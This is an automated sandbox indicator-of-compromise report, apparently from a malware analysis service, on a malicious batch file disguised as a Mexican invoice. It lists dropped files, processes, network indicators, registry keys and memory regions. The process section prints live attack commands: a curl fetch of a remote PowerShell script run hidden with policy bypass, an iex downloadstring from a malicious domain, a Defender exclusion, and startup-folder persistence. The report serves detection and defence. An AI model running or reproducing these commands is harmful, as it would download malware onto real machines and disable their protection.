IOC Report
Factura-2410-CFDI.bat

loading gif

Files

File Path
Type
Category
Malicious
Factura-2410-CFDI.bat
DOS batch file, ASCII text, with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_V.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Icon number=1, Archive, ctime=Sat Oct 26 21:21:46 2024, mtime=Sat Oct 26 21:21:46 2024, atime=Sat Oct 26 21:21:46 2024, length=481, window=hidenormalshowminimized
dropped
malicious
C:\Users\Public\Documents\vs1.ps1
awk or perl script, ASCII text, with very long lines (456), with CRLF line terminators
modified
malicious
C:\Users\Public\computer_kjfech8_V.cmd
DOS batch file, ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\Public\computer_kjfech8_Vy.cmd
DOS batch file, ASCII text, with CRLF line terminators
dropped
malicious
C:\_kjfech8_V\_kjfech8_V.exe (copy)
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\_kjfech8_V\exe.txt
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\_kjfech8_V\jli.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash__kjfech8_Vi7.exe_c8f99aa578fab6eaaead194b1cb93e27a87ba_17b648d7_79ce850f-cd16-4317-9d1c-184b0f22106c\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1A84.tmp.dmp
Mini DuMP crash report, 14 streams, Sat Oct 26 22:22:04 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B12.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B42.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2qitb4ik.utm.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5wiwsnj3.adr.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_blqdhdij.dyb.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hnzpo32z.vty.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hoibnyb5.1gg.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kc0gc2oy.amb.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m24gtgkd.jnw.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oztbspws.bc5.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_spj4h3id.ev5.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tjkvajs3.ge2.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ygthgct0.dsq.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zywqmgiq.4yr.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_VAA.lnk
MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, Icon number=1, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_VAT.lnk
MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, Has command line arguments, Icon number=1, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_VEX.lnk
MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, Has command line arguments, Icon number=1, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_Vy.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Icon number=1, Archive, ctime=Sat Oct 26 21:21:46 2024, mtime=Sat Oct 26 21:21:46 2024, atime=Sat Oct 26 21:21:46 2024, length=482, window=hidenormalshowminimized
dropped
C:\Users\Public\201024
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Windows \System32\fodhelper.exe
PE32+ executable (GUI) x86-64, for MS Windows
dropped
C:\_kjfech8_V\6.txt
data
dropped
C:\_kjfech8_V\MSVCR100.dll (copy)
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\_kjfech8_V\MSVCR100.txt
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\_kjfech8_V\computer_kjfech8_V
ASCII text, with CRLF line terminators
dropped
C:\_kjfech8_V\computer_kjfech8_Vy
ASCII text, with CRLF line terminators
dropped
C:\_kjfech8_V\WebView2Loader.dll (copy)
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\_kjfech8_V\WebView2Loader.txt
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\_kjfech8_V\_kjfech8_V._kjfech8_V
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\_kjfech8_V\_kjfech8_V.ai (copy)
data
dropped
C:\_kjfech8_V\_kjfech8_V.at (copy)
data
dropped
C:\_kjfech8_V\_kjfech8_V.ia (copy)
data
dropped
C:\_kjfech8_V\_kjfech8_V.zip (copy)
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\_kjfech8_V\_kjfech8_Vi7.exe (copy)
PE32 executable (console) Intel 80386, for MS Windows
dropped
C:\_kjfech8_V\b.txt
data
dropped
C:\_kjfech8_V\c.txt
data
dropped
C:\_kjfech8_V\i7.txt
PE32 executable (console) Intel 80386, for MS Windows
dropped
C:\_kjfech8_V\jli.txt
JSON data
dropped
\Device\ConDrv
ASCII text, with CR, LF line terminators
dropped
There are 41 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Factura-2410-CFDI.bat" "
malicious
C:\Windows\System32\curl.exe
curl "https://firebasestorage.googleapis.com/v0/b/antonidesil.appspot.com/o/at3?alt=media&token=0c52e418-0803-44a8-b1e0-254f44c155e2" -o "C:\Users\Public\Documents\vs1.ps1"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\computer_kjfech8_V.cmd" "
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://fsnat.shop/a/08/150822/up/up') "
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -win 1 -
malicious
C:\_kjfech8_V\_kjfech8_Vi7.exe
"C:\_kjfech8_V\_kjfech8_Vi7.exe"
malicious
C:\_kjfech8_V\_kjfech8_Vi7.exe
"C:\_kjfech8_V\_kjfech8_Vi7.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\_kjfech8_V"
malicious
C:\Windows\System32\shutdown.exe
"C:\Windows\system32\shutdown.exe" /r /t 10
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -NoProfile -ExecutionPolicy Bypass -Command "$psakeDir = ([array](dir """C:\Users\user\Desktop\vendor\packages\psake.*"""))[-1]; ".$psakeDir\tools\psake.ps1" build.psake.ps1 -ScriptPath "$psakeDir\tools" ; if ($psake.build_success -eq $false) { exit 1 } else { exit 0 }"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1492 -s 1184
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
There are 8 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
malicious
http://62.72.3.210/ldht/index.php
62.72.3.210
malicious
https://github.com/Pester/Pester
unknown
malicious
https://fsnat.shop/a/08/150822/up/up
93.127.200.211
malicious
http://nuget.org/NuGet.exe
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
https://aka.ms/pscore6lB
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://crl.microsoft.co:
unknown
https://contoso.com/License
unknown
http://www.apache.org/licenses/LICENSE-2.0.htmlXzi
unknown
https://contoso.com/Icon
unknown
http://www.quovadis.bm0
unknown
http://pesterbdd.com/images/Pester.pngXzi
unknown
https://aka.ms/pscore68
unknown
http://86.38.217.167
unknown
https://ocsp.quovadisoffshore.com0
unknown
http://62.72.3.210
unknown
https://github.com/Pester/PesterXzi
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
There are 13 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
fsnat.shop
93.127.200.211
malicious

IPs

IP
Domain
Country
Malicious
93.127.200.211
fsnat.shop
Germany
malicious
62.72.3.210
unknown
Germany
malicious
86.38.217.167
unknown
Lithuania

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER_Classes\ms-settings\Shell\Open\command
DelegateExecute
HKEY_CURRENT_USER_Classes\ms-settings\Shell\Open\command
NULL
\REGISTRY\A\{e6e2f99c-1712-8ac9-29a4-2b40104e2127}\Root\InventoryApplicationFile\_kjfech8_vi7.exe|e9f58e1b822d44ea
ProgramId
\REGISTRY\A\{e6e2f99c-1712-8ac9-29a4-2b40104e2127}\Root\InventoryApplicationFile\_kjfech8_vi7.exe|e9f58e1b822d44ea
FileId
\REGISTRY\A\{e6e2f99c-1712-8ac9-29a4-2b40104e2127}\Root\InventoryApplicationFile\_kjfech8_vi7.exe|e9f58e1b822d44ea
LowerCaseLongPath
\REGISTRY\A\{e6e2f99c-1712-8ac9-29a4-2b40104e2127}\Root\InventoryApplicationFile\_kjfech8_vi7.exe|e9f58e1b822d44ea
LongPathHash
\REGISTRY\A\{e6e2f99c-1712-8ac9-29a4-2b40104e2127}\Root\InventoryApplicationFile\_kjfech8_vi7.exe|e9f58e1b822d44ea
Name
\REGISTRY\A\{e6e2f99c-1712-8ac9-29a4-2b40104e2127}\Root\InventoryApplicationFile\_kjfech8_vi7.exe|e9f58e1b822d44ea
OriginalFileName
\REGISTRY\A\{e6e2f99c-1712-8ac9-29a4-2b40104e2127}\Root\InventoryApplicationFile\_kjfech8_vi7.exe|e9f58e1b822d44ea
Publisher
\REGISTRY\A\{e6e2f99c-1712-8ac9-29a4-2b40104e2127}\Root\InventoryApplicationFile\_kjfech8_vi7.exe|e9f58e1b822d44ea
Version
\REGISTRY\A\{e6e2f99c-1712-8ac9-29a4-2b40104e2127}\Root\InventoryApplicationFile\_kjfech8_vi7.exe|e9f58e1b822d44ea
BinFileVersion
\REGISTRY\A\{e6e2f99c-1712-8ac9-29a4-2b40104e2127}\Root\InventoryApplicationFile\_kjfech8_vi7.exe|e9f58e1b822d44ea
BinaryType
\REGISTRY\A\{e6e2f99c-1712-8ac9-29a4-2b40104e2127}\Root\InventoryApplicationFile\_kjfech8_vi7.exe|e9f58e1b822d44ea
ProductName
\REGISTRY\A\{e6e2f99c-1712-8ac9-29a4-2b40104e2127}\Root\InventoryApplicationFile\_kjfech8_vi7.exe|e9f58e1b822d44ea
ProductVersion
\REGISTRY\A\{e6e2f99c-1712-8ac9-29a4-2b40104e2127}\Root\InventoryApplicationFile\_kjfech8_vi7.exe|e9f58e1b822d44ea
LinkDate
\REGISTRY\A\{e6e2f99c-1712-8ac9-29a4-2b40104e2127}\Root\InventoryApplicationFile\_kjfech8_vi7.exe|e9f58e1b822d44ea
BinProductVersion
\REGISTRY\A\{e6e2f99c-1712-8ac9-29a4-2b40104e2127}\Root\InventoryApplicationFile\_kjfech8_vi7.exe|e9f58e1b822d44ea
AppxPackageFullName
\REGISTRY\A\{e6e2f99c-1712-8ac9-29a4-2b40104e2127}\Root\InventoryApplicationFile\_kjfech8_vi7.exe|e9f58e1b822d44ea
AppxPackageRelativeId
\REGISTRY\A\{e6e2f99c-1712-8ac9-29a4-2b40104e2127}\Root\InventoryApplicationFile\_kjfech8_vi7.exe|e9f58e1b822d44ea
Size
\REGISTRY\A\{e6e2f99c-1712-8ac9-29a4-2b40104e2127}\Root\InventoryApplicationFile\_kjfech8_vi7.exe|e9f58e1b822d44ea
Language
\REGISTRY\A\{e6e2f99c-1712-8ac9-29a4-2b40104e2127}\Root\InventoryApplicationFile\_kjfech8_vi7.exe|e9f58e1b822d44ea
Usn
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData
TickCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Property
001800111E88FCB5
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}
DeviceTicket
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}
DeviceId
There are 30 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
14C393C1000
trusted library allocation
page read and write
7510000
trusted library allocation
page read and write
41BDFEE000
stack
page read and write
4709000
trusted library allocation
page read and write
1E7A714E000
trusted library allocation
page read and write
2783000
direct allocation
page read and write
A60000
heap
page read and write
43E7000
trusted library allocation
page read and write
D02000
unkown
page readonly
304B000
stack
page read and write
1E7A534E000
trusted library allocation
page read and write
14C5180E000
heap
page read and write
89AF000
stack
page read and write
6C6D4000
unkown
page readonly
41BE2FE000
stack
page read and write
7FFF4432C000
trusted library allocation
page execute and read and write
721E000
stack
page read and write
41BEB7E000
stack
page read and write
E6E000
stack
page read and write
52B000
heap
page read and write
1E792E56000
trusted library allocation
page read and write
41A0000
trusted library allocation
page read and write
5A0000
heap
page read and write
8110000
trusted library allocation
page read and write
7060000
heap
page read and write
81A2000
heap
page read and write
14C376A0000
trusted library allocation
page read and write
14C37734000
heap
page read and write
670D000
stack
page read and write
14C373E3000
heap
page read and write
1E7A2871000
trusted library allocation
page read and write
1AA88AA3000
heap
page read and write
6C4E0000
unkown
page readonly
6D997E000
stack
page read and write
77E000
stack
page read and write
14C51803000
heap
page read and write
1AA88A9C000
heap
page read and write
1AA88AA3000
heap
page read and write
E1E000
stack
page read and write
87CE000
stack
page read and write
14C5158A000
heap
page read and write
1952EFE000
stack
page read and write
88830FF000
stack
page read and write
4999000
trusted library allocation
page read and write
AED000
trusted library allocation
page execute and read and write
6D40000
heap
page read and write
A4A000
stack
page read and write
6DA0BE000
stack
page read and write
89AC000
stack
page read and write
81B4000
heap
page read and write
1E790802000
heap
page read and write
276D000
direct allocation
page read and write
456000
heap
page read and write
1AA88B24000
heap
page read and write
7FFF444C0000
trusted library allocation
page read and write
1AA88ACB000
heap
page read and write
1E7A5D4E000
trusted library allocation
page read and write
AE0000
trusted library allocation
page read and write
6DA1000
heap
page read and write
D01000
unkown
page execute read
1DD000
stack
page read and write
14C39074000
heap
page read and write
888317E000
stack
page read and write
14C517E3000
heap
page read and write
7FFF44280000
trusted library allocation
page read and write
6C4E1000
unkown
page execute read
14C376C0000
heap
page execute and read and write
84A0000
trusted library allocation
page read and write
1AA88AAB000
heap
page read and write
278A000
direct allocation
page read and write
14C51551000
heap
page read and write
6C6C0000
unkown
page read and write
4A37000
trusted library allocation
page read and write
1952FFE000
stack
page read and write
14C375E0000
heap
page read and write
5311000
trusted library allocation
page read and write
750000
heap
page read and write
14C51790000
heap
page read and write
B49000
heap
page read and write
14C5179C000
heap
page read and write
7FFF44430000
trusted library allocation
page execute and read and write
D04000
unkown
page readonly
49E000
unkown
page read and write
1E792200000
trusted library allocation
page read and write
47C7000
trusted library allocation
page read and write
D01000
unkown
page execute read
6E90000
trusted library allocation
page read and write
D00000
unkown
page readonly
1AA88AF1000
heap
page read and write
1040000
heap
page read and write
485E000
trusted library allocation
page read and write
4120000
trusted library allocation
page read and write
7FFF44356000
trusted library allocation
page execute and read and write
2BE0000
heap
page read and write
825C000
heap
page read and write
6DAF8F000
stack
page read and write
41BF88E000
stack
page read and write
41BF8CF000
stack
page read and write
8130000
trusted library allocation
page read and write
7FFF444B0000
trusted library allocation
page read and write
7FFF44273000
trusted library allocation
page execute and read and write
7FFF444F0000
trusted library allocation
page read and write
80DE000
stack
page read and write
41C0000
heap
page execute and read and write
73DE000
stack
page read and write
1E792230000
heap
page readonly
878E000
stack
page read and write
6C6C1000
unkown
page write copy
B8A000
heap
page read and write
14C37300000
heap
page read and write
7FFF44452000
trusted library allocation
page read and write
14C39B82000
trusted library allocation
page read and write
D04000
unkown
page readonly
1E7922C0000
heap
page execute and read and write
7FFF445A0000
trusted library allocation
page read and write
6D84000
heap
page read and write
6D9EB8000
stack
page read and write
14C38FA0000
heap
page read and write
41BE97E000
stack
page read and write
14C373BD000
heap
page read and write
741C000
stack
page read and write
2784F150000
heap
page read and write
4168000
trusted library allocation
page read and write
6D6A000
heap
page read and write
2E3E000
stack
page read and write
499D000
trusted library allocation
page read and write
6D9BFF000
stack
page read and write
88EE000
stack
page read and write
1E7930C2000
trusted library allocation
page read and write
1E7908EE000
heap
page read and write
7FFF44326000
trusted library allocation
page read and write
4B0000
heap
page read and write
2C30000
heap
page read and write
41BFC4D000
stack
page read and write
864E000
stack
page read and write
14C514D0000
heap
page read and write
14C51528000
heap
page read and write
D00000
unkown
page readonly
7FFF445C0000
trusted library allocation
page read and write
48D8000
trusted library allocation
page read and write
B1D000
stack
page read and write
1E7A854E000
trusted library allocation
page read and write
14C51582000
heap
page read and write
490000
heap
page read and write
74F0000
trusted library allocation
page read and write
1E79082C000
heap
page read and write
14C517D6000
heap
page read and write
14C51797000
heap
page read and write
6FE000
stack
page read and write
6D9C7F000
stack
page read and write
892D000
stack
page read and write
41BF9CA000
stack
page read and write
14C37462000
heap
page read and write
2784EE34000
heap
page read and write
2DAE000
stack
page read and write
42F2000
trusted library allocation
page read and write
7FFF442CC000
trusted library allocation
page execute and read and write
6749000
stack
page read and write
14C517A7000
heap
page read and write
1AA88AAF000
heap
page read and write
1AA88ACA000
heap
page read and write
7FFF44421000
trusted library allocation
page read and write
1E7909D0000
heap
page read and write
884E000
stack
page read and write
5307000
trusted library allocation
page read and write
809E000
stack
page read and write
41BFB4C000
stack
page read and write
71DE000
stack
page read and write
1E792A77000
trusted library allocation
page read and write
7FFF4442A000
trusted library allocation
page read and write
7000000
trusted library allocation
page execute and read and write
2758000
direct allocation
page read and write
81B0000
heap
page read and write
D02000
unkown
page readonly
1AA88B25000
heap
page read and write
801E000
stack
page read and write
2738000
direct allocation
page read and write
14C515C8000
heap
page read and write
81BC000
heap
page read and write
14C373C4000
heap
page read and write
52FB000
trusted library allocation
page read and write
1AA88AD0000
heap
page read and write
6F2E000
stack
page read and write
8480000
trusted library allocation
page read and write
1E790876000
heap
page read and write
14C395F4000
trusted library allocation
page read and write
2747000
direct allocation
page read and write
7FFF44570000
trusted library allocation
page read and write
14C37570000
heap
page read and write
81C4000
heap
page read and write
411A000
trusted library allocation
page execute and read and write
41BEA7B000
stack
page read and write
68EE000
stack
page read and write
1E7930B4000
trusted library allocation
page read and write
41BE678000
stack
page read and write
1E8000
stack
page read and write
1E7A7B4E000
trusted library allocation
page read and write
277C000
direct allocation
page read and write
84B0000
trusted library allocation
page read and write
7FFF44272000
trusted library allocation
page read and write
7FFF444A0000
trusted library allocation
page read and write
14C51614000
heap
page read and write
170000
heap
page read and write
2766000
direct allocation
page read and write
6DA3BE000
stack
page read and write
7F960000
trusted library allocation
page execute and read and write
74B0000
heap
page read and write
1E792851000
trusted library allocation
page read and write
6FD70000
unkown
page readonly
41BED7E000
stack
page read and write
4109000
trusted library allocation
page read and write
8050000
heap
page read and write
8470000
trusted library allocation
page read and write
6810000
heap
page execute and read and write
5318000
trusted library allocation
page read and write
14C3943F000
trusted library allocation
page read and write
6DF2000
heap
page read and write
7550000
trusted library allocation
page read and write
CF0000
direct allocation
page execute and read and write
14C39076000
heap
page read and write
880E000
stack
page read and write
1E7A2878000
trusted library allocation
page read and write
6E1C000
heap
page read and write
1AA88AD0000
heap
page read and write
6D9F3E000
stack
page read and write
6C6C5000
unkown
page write copy
14C373FB000
heap
page read and write
41BF94A000
stack
page read and write
870E000
stack
page read and write
2730000
direct allocation
page read and write
4863000
trusted library allocation
page read and write
725E000
stack
page read and write
B8C000
heap
page read and write
6AAB000
stack
page read and write
1E790874000
heap
page read and write
6E40000
heap
page read and write
7FFF445B0000
trusted library allocation
page read and write
6B9F000
stack
page read and write
7FFF44274000
trusted library allocation
page read and write
7530000
trusted library allocation
page read and write
4865000
trusted library allocation
page read and write
6DA1BD000
stack
page read and write
1E7A494E000
trusted library allocation
page read and write
7FFF44490000
trusted library allocation
page read and write
7FFF44580000
trusted library allocation
page read and write
7FFF44470000
trusted library allocation
page read and write
8184000
heap
page read and write
D00000
unkown
page readonly
6DA43E000
stack
page read and write
C7D000
stack
page read and write
6C6CF000
unkown
page write copy
1AA88ACA000
heap
page read and write
1AA88AA0000
heap
page read and write
7BE000
stack
page read and write
1E79084C000
heap
page read and write
7C0000
heap
page read and write
7DF46C280000
trusted library allocation
page execute and read and write
1AC000
stack
page read and write
30C0000
heap
page read and write
A80000
heap
page read and write
1E7907F9000
heap
page read and write
1AA88AAF000
heap
page read and write
4140000
trusted library allocation
page read and write
4190000
trusted library allocation
page execute and read and write
14C493D1000
trusted library allocation
page read and write
6BDE000
stack
page read and write
8047000
trusted library allocation
page read and write
7FDD000
stack
page read and write
84B3000
trusted library allocation
page read and write
424E000
stack
page read and write
6A2B000
stack
page read and write
8180000
heap
page read and write
1952B8C000
stack
page read and write
1AA88FC0000
remote allocation
page read and write
6FE24000
unkown
page read and write
1AA88ACA000
heap
page read and write
868E000
stack
page read and write
1AA88B0B000
heap
page read and write
7FFF444E0000
trusted library allocation
page read and write
49A1000
trusted library allocation
page read and write
2750000
direct allocation
page read and write
7520000
trusted library allocation
page read and write
1E7908E4000
heap
page read and write
2784EE28000
heap
page read and write
6FAE000
stack
page read and write
850000
heap
page read and write
596000
heap
page read and write
1E7A674E000
trusted library allocation
page read and write
41BE8FE000
stack
page read and write
7FFF44560000
trusted library allocation
page read and write
1AA88AAF000
heap
page read and write
822C000
heap
page read and write
41BE77D000
stack
page read and write
4125000
trusted library allocation
page execute and read and write
6C1E000
stack
page read and write
888D000
stack
page read and write
14C514FD000
heap
page read and write
1E7930C6000
trusted library allocation
page read and write
41BE57D000
stack
page read and write
1AA88FB0000
unclassified section
page readonly
300F000
stack
page read and write
84C0000
trusted library allocation
page read and write
8186000
heap
page read and write
6FE25000
unkown
page write copy
48D2000
trusted library allocation
page read and write
6FE24000
unkown
page read and write
2CB0000
heap
page read and write
1AA890D0000
heap
page read and write
6DE8000
heap
page read and write
14C37730000
heap
page read and write
6DA13B000
stack
page read and write
6FE29000
unkown
page readonly
8120000
trusted library allocation
page read and write
6FD70000
unkown
page readonly
1E792365000
heap
page read and write
1E792220000
trusted library allocation
page read and write
1E790A40000
heap
page read and write
7FFF44500000
trusted library allocation
page read and write
6D9E3C000
stack
page read and write
41BEAFE000
stack
page read and write
7FFF44480000
trusted library allocation
page read and write
1E7A3F4E000
trusted library allocation
page read and write
6DA4BD000
stack
page read and write
1E7908CC000
heap
page read and write
14C515E6000
heap
page execute and read and write
7FFF44550000
trusted library allocation
page read and write
4995000
trusted library allocation
page read and write
704E000
stack
page read and write
47F5000
trusted library allocation
page read and write
6C6C6000
unkown
page read and write
6E03000
heap
page read and write
7FFF44520000
trusted library allocation
page read and write
7FFF44320000
trusted library allocation
page read and write
1E790960000
heap
page read and write
80E0000
trusted library allocation
page read and write
6D9D3E000
stack
page read and write
4180000
heap
page read and write
1AA88A80000
unclassified section
page readonly
1AA88950000
unclassified section
page readonly
6DA2BD000
stack
page read and write
6EA0000
heap
page execute and read and write
62CC000
stack
page read and write
6DAF4E000
stack
page read and write
1E790831000
heap
page read and write
739E000
stack
page read and write
7FFF44410000
trusted library allocation
page read and write
7FFF44590000
trusted library allocation
page read and write
B40000
heap
page read and write
1AA88AD0000
heap
page read and write
1E792FBC000
trusted library allocation
page read and write
14C5152A000
heap
page read and write
2791000
direct allocation
page read and write
14C51AB0000
heap
page read and write
7580000
trusted library allocation
page read and write
14C398AE000
trusted library allocation
page read and write
14C3746C000
heap
page read and write
4861000
trusted library allocation
page read and write
1E792840000
heap
page read and write
49DD000
trusted library allocation
page read and write
4922000
trusted library allocation
page read and write
818E000
heap
page read and write
450000
heap
page read and write
4122000
trusted library allocation
page read and write
4287000
heap
page read and write
41BE7F9000
stack
page read and write
14C397BF000
trusted library allocation
page read and write
6DA23A000
stack
page read and write
4B8000
heap
page read and write
1AA88F40000
heap
page read and write
7FFF44290000
trusted library allocation
page read and write
2CA4000
heap
page read and write
8890000
trusted library allocation
page execute and read and write
6DF6000
heap
page read and write
D00000
unkown
page readonly
88831FE000
stack
page read and write
81B8000
heap
page read and write
840000
trusted library section
page read and write
2721000
direct allocation
page read and write
81CC000
heap
page read and write
1E7A2B4E000
trusted library allocation
page read and write
41BE37E000
stack
page read and write
41BFA4E000
stack
page read and write
41BFACC000
stack
page read and write
7FFF44530000
trusted library allocation
page read and write
4280000
heap
page read and write
888307C000
stack
page read and write
6C6C2000
unkown
page read and write
69AA000
stack
page read and write
14C373DF000
heap
page read and write
4291000
trusted library allocation
page read and write
1E790879000
heap
page read and write
41BEBFD000
stack
page read and write
6D98FE000
stack
page read and write
273F000
direct allocation
page read and write
14C515A2000
heap
page read and write
41BEDFC000
stack
page read and write
1AA88B24000
heap
page read and write
1E7A2880000
trusted library allocation
page read and write
1E790837000
heap
page read and write
6B5E000
stack
page read and write
1AA88B90000
heap
page read and write
1AA88B0B000
heap
page read and write
4E6000
heap
page read and write
6BF000
unkown
page read and write
14C51760000
heap
page read and write
7FFF4427D000
trusted library allocation
page execute and read and write
81F2000
heap
page read and write
6A6E000
stack
page read and write
14C5182D000
heap
page read and write
14C516F0000
heap
page execute and read and write
47CD000
